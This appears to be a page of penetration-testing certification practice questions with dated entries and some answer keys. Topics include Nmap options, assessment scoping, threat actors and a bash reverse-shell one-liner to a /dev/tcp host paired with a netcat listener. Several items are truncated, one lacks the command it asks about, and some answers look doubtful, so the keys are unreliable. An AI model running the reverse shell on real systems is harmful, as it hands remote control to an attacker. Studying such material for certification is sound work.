Which of the following additional commands would need to be executed on the tester’s Linux system to make the previous command successful?

A tester intends to run the following command on a target system:

bash -i >& /dev/tcp/10.2.4.6/443 0>&1

Which of the following additional commands would need to be executed on the tester’s Linux system to make the previous command successful?

A. nc -nlvp 443
B. nc 10.2.4.6. 443
C. nc...

June 1, 2021

Which of the following has occurred in this situation?

A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks:

✑ Code review
✑ Updates to firewall settings

Which of the following has occurred in this situation?

A. ...

June 1, 2021

Which of the following has a direct and significant impact on the budget of the security assessment?

Which of the following has a direct and significant impact on the budget of the security assessment?

A. Scoping
B. Scheduling
C. Compliance requirement
D. Target risk

Answer: D

June 1, 2021

Which of the following will be returned?

A penetration tester runs the following on a machine: Which of the following will be returned?

A. 1
B. 3
C. 5
D. 6

Answer: B

June 1, 2021

Which of the following Nmap commands should the tester use?

A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?

A. nmap -p 22 -iL targets
B. nmap -p 22 -sL targets
C. nmap -p 22 -oG targets
D. nmap -p 22 -oA targets

June 1, 2021

For which of the following types of attack would this information be used?

A penetration tester is utilizing social media to gather information about employees at a company. The tester has created a list of popular words used in employee profiles. For which of the following types of attack would this information be used?

A. Exploit chaining
B. Session hijacking
C. Dictionary
D. ...

June 1, 2021

In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?

In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?

A. Common libraries
B. Configuration files
C. Sandbox escape
D. ASLR bypass

Answer: A

May 31, 2021

When performing compliance-based assessments, which of the following is the MOST important key consideration?

When performing compliance-based assessments, which of the following is the MOST important key consideration?

A. Additional rate
B. Company policy
C. Impact tolerance
D. Industry type

Answer: D

May 31, 2021

While prioritizing findings and recommendations for an executive summary, which of the following considerations would be MOST valuable to the client?

While prioritizing findings and recommendations for an executive summary, which of the following considerations would be MOST valuable to the client?

A. Levels of difficulty to exploit identified vulnerabilities
B. Time taken to accomplish each step
C. Risk tolerance of the organization
D. Availability of patches and remediations

Answer: C

May 31, 2021

Which of the following BEST describes the abilities of the threat actor?

A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?

A. Advanced persistent threat
B. Script kiddie
C. Hacktivist
D. Organized crime

Answer: B

Explanation: Reference https://www.sciencedirect.com/topics/computer-science/disgruntled-employee

May 31, 2021